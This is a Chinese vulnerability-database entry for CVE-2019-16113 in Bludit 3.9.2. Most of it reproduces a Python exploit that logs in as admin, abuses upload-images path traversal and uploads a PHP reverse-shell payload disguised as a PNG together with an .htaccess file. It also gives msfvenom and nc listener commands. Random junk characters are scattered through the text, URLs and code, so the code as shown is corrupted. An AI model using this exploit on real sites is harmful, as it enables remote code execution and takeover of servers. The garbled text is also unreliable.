Bludit 安全漏洞

漏洞ID 1734476 漏洞类型 代码注入
发布时间 2020-07-30 更新时间 2020-07-30
CVE编号 CVE-2019-16113

CNNVD-ID CNNVD-201909-283
漏洞平l 6 3 N/A CVSS评分 N/A
|漏洞来源
https://X 1 i 8 q }cxsecurity.com/issue/WLB-2020070142
http://wh 8 V ) ? ; k Bww.cnnvd.org.cnV K } b ] J l q/web/xxk/ldxqB3 R y 6 + h | (yId.? 8 otag?CNNVD=CNNVD-201909( ) 9 f O _ ^ q L-283
|漏洞详情
Bludit是一套开源的轻量级博; z Z P w :客内容管理系统(CMS)。
Bludit 3.9.2版本中存在安全漏洞。远程攻击者可借助bl-kernel/ajax/upload-images.php文件利用该漏洞执行代码。
|漏洞EXP
# Titlb F k & m ; j 6e: Bludn 8 f ! Bit 3.9.2 - DiT / * x ( f ; c rectoryr  + 6 Traversal
# Author: James Green
# Date:i . . T 2020-07-20
# Vendor Home; T qpage: https://www.blo | l 7 I Eudit.com
# Software Link: hS k ] j D a { https://github.com_ ? ] + K x {/bludit/bludit
# Version: 3.9.2
# Tested on: Linux Ubuntu 19.10 Eoan
# CVE: CVE-2019-16113
#
# Special Thanks to Ali Faraj (@InfoSecAli) and authors of MSF Module httb v ] T .ps://www.exploit-db.com/exploits/47699
#### USAGE ####
# 1. Cr0 C Leate payloads: .png with PHP payload and thet + * A .htaccess to treat .pngs like P|  2 # ) .HP
# 2. Change hardcoded values:P T m D { P URLg . N v is your ta$ a . i $rget webapp, username an. z J _ = G v jd% m 8 T / password is admin creds to get to the admin dir
# 3. RunP # = J n / Z u th2 + I d a * -e exploit
# 4. Start a listener to match your payload: `nc -nlvp 53`, meterpreter multi handler, etc
# 5. Visit your target web app and open the evil px [ : Qicture: visit url + /bl-content/tmp/temp/evil.png
#!/usr/bin/env python3
import requests
import re
im!  ~ aport argparse
impo@ L } ! T _rt random
import string
import base64
from requests.exceptions import Timeou{ ? f # w ht
url = L h l } s'httpQ l - H [ 6 5://127.0.0.1'  # CHANGE ME
usU 8 E T ^ %ernamen o  ` = 3 = 'James'  # CHANGE ME ? O l 0 UE
password = 'Summer2020'  # CHANGE ME
# msfvenom -p php/reverse_p% ` !hp LHOST=127.0.0.1 LPORT=53 -f raw -b '"' > evz u t G _ X & Kil.png
# echo -e "<?php $(cat evil.png)" > evil.png
payload = 'evil.png] 8 .'  # CREATE ME
# echo "RewriteEngine off" > .htaccess
#C m O | 0 T F echo "AddType application/x-httpK 8 f xd-php .png" &a ` B n O O hgt;> .htaccess
payload2 = '.htaccess'  # CREATE ME
del N S cf login(url,username,password):
""" Log inX M ] { { Y with providedY + f = s y admin creds, grab the cookie once authenticated """
sessioo / 7 / } {n = requV * + M t T w Fests.Session()
logino D H # A o $ ] D_page = sessio} ? ,  ] mn.get(url + "/admin/")
csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"',
login_page.tex# V ~ zt
).group(1)
cookie = ((login_page.headers["SetT , ( - 2 k _  Z-Cookie"]).split(";")[0].split("=")[1])
data = {"save":"",
"t : * q i 9 d Wpassword2 y B ~ 0 4":password,B b N q T E , x R
"tokenCSRF":csrf_token,
"username":username}
headers = {"Origin":url,
"Accept"O 9 { 9:"text/html,application/xhtml+xml,ah g 1 tpplication/xml;q=0.9,image/webp,*/*;q=0.8",
"- v fUpgrade-Insecure-Requests":"1",O N = k F
"User-Agent":"Mozilla/5.0 (WB ] a L F * [ Xindows NT 10.0; Win64; x64; rv:76.0) Gec& ? b X @ko/20100101 Firefox/76.0",
"Connection":"close",
"Referer": url + "/admin/",
"Accept-Language":"es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3t g a @ m E $ ",
"Accept-EncoJ ; ? A d Q 8ding":"gzip,V e ? P X r deflate",
"Z g r p W 6Content-Type"3 T I 0:"application/x-www-form-urlencoded"T ~ h | u
}
cookies = {C w U v x"BLUDIT-KEY":cookie}
response = session.post(url + "/admin/",
data=data,
hB n | F x 2 u w Peaders=headeM S ` T ` Q m ;rs,
cookies=cookies,
allow_redirects = False
)
print("cookie: " + cookie)
return cookie
def get_csrf_token(url,cookie):
""" Grab the CSRF token frou N h wm an authed session """
session = requests.Session()
headers = {"Origin"X O b d:url,
"Accept":8 C H"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Upgrade-Insecure-Requests":"1",
"User-Agent":u , W T $ y N A e"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Fi# / 8 g p L r Z [refox/76.0",
"Connection":"close",
"Referer":ui N K r u a Arl + "/admin/",
"Accept-Language":5 X N q"es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3"; r Q T N,
"Accept-Ence 5 j H s $ y  ooding":"gzip, deflate"}
cookies = {"BLUDIT-KEY":cookie}
response = session.get(url + "/adm, a N + & d R 1 Ein/dashboard",
headers=headers,
cookies=cookies
)
csrO A h , c rf_token = re( 2 ^  Ksponse.text.split('var tokenCSRF = "')[1].split('"')[0]
print("csrf_token: " + csrf_token)
retJ ` S u S N w Hurn csrf_token
def uploa. e H |d_evil_image(url, cookie, csrf_token, payload, override_uuid=False):
""" Upload files required for to exe. z * C } )cuR R M % n h { fte PHP fr, q X Vom malicious image files. Payload and .htaccess """
sessioI / e u * W n = requests.Session()
files= {"images[]": (payload,
open(] Z 3 u fpayload, "rb"),
"multipart/form-data",
{"Content-Type": "image/png", "filename":payload}
)}
if overr2 & h c J + 2ide_g 8 = Z $ 5u~ = 3 s G E D yuid:
data = {"uuid": "../../tmp/. p = &temp",
"tokenCSRF":csrf_token}
else:
# On the vuln app, this line o= x F Hccw / ; 2 # qurs first:
# Filesystem::mv($_FILES['images']['tmp_name'][$uuid], PATH_TMP.$filename);
# Even though there is a file extension check, it won't really stop us
# from uploading the .htaccess file.
data = {"tokenCSRF":csrf_tokeG c N 8n}
headers = {"Origin":url,
"Accg W c W r { @ Bept":q } & b D"*/*",
"X-Requested-With":"XMLHttpRequest",
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x6P + B d S e m [4; rv:76.0) G| { = R O z k & !ecko/20100101 Firefox/76.0",
"Connection":"close",
"Referer":url + "/admin/new-content",
"Accept-Language":"es-ES,es;q=0.8,en-y o * y h vUS;q=0.5,en;q=0.3",
"Accept-Encoding":"gzip, deflate",
}
cookies = {"BLUDIT-KEY":cookieN + 9 I ) ) l}
response = session.post(url + "/admin/ajax/upload-images", data=data, files=files, headers=headers, cookies=cookies)
print("Uploading payload:1 r & r ] e " + payload)
if __name__ == "__main__":
cookie = login(url, username,| G - password)
tokeO B $ vn = get_O T Z k : z kcsrf_token(url, cookie)
upload_evil_image(url, cookie, token, payload, True)
upload_evil_image(u] v T O Trl, cookie, token, payload2)
|参考资料

来源:MISC

链接f u ! i W:https://github.com/bludit/bludit/issues/1081